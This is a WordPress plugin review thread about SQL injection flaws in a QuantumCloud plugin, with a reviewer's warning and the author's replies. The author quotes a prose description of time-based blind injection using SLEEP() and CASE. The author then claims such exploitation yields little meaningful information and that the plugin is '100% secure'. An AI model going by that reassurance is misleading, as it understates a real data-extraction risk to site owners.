• johnbairdconsulting

    (@johnbairdconsulting)


    The plugin had SQL Injection vulnerabilities that would allow admin access without any account. Any random person using the site could gain access to the database.

    SQL injection should not an issue in 2023 (or 10 years ago) because its extremely easy to prevent. Such issues existing show a very low quality development team that have no knowledge of security

    Do not use this plugin.

Viewing 5 replies - 1 through 5 (of 5 total)
  • Plugin Author QuantumCloud

    (@quantumcloud)

    Thank you for your feedback.

    Some issues were found and patched promptly. We urge everyone to upgrade to the latest version.

    Thread Starter johnbairdconsulting

    (@johnbairdconsulting)

    Yes but that shouldn’t have happened in the first place. No competent developer makes those mistakes. There are surely many more security holes.

    I confirm our blog was hacked after installing it. We love the idea though. Is it safe to install now?

    • This reply was modified 5 months, 1 week ago by darkzbaron.
    Thread Starter johnbairdconsulting

    (@johnbairdconsulting)

    @dark There will be other security holes if the developers make SQL injection mistakes. Look for another plugin that uses competent developers.

    Plugin Author QuantumCloud

    (@quantumcloud)

    @darkzbaron Sorry for the late reply because of the weekends. Bugs and vulnerabilities are normal part of any software development life cycle. We learn from our mistakes and do better next time.

    The plugin is currently vetted by security companies like Wordfence and WP Scanner and it is 100% secure to the best of our knoweldge.

    It was very unlikely that the hacking on your website happened because of our plugin. The way the mysql injection issue on our plugin could be exploited was explained like this by Wordfence: The lack of a UNION operation in the above SQL query makes exploiting this vulnerability more difficult, but a time-based blind injection approach using the SLEEP() function and CASE statements can still be used to extract information from the database by observing the duration of individual queries. While tedious, this technique can be used to extract sensitive information from the database. 

    As you can see, there was no easy way to exploit this. You would need to have a very high profile website if anyone would try to attempt. Even so, there is very little chance of gaining any meaningful information through this. After all, how much information you can get by observing the time delay of a sql query?

    At any rate, we suggest using a security plugin like Wordfence on all your websites.

    Thank you!

Viewing 5 replies - 1 through 5 (of 5 total)
  • You must be logged in to reply to this review.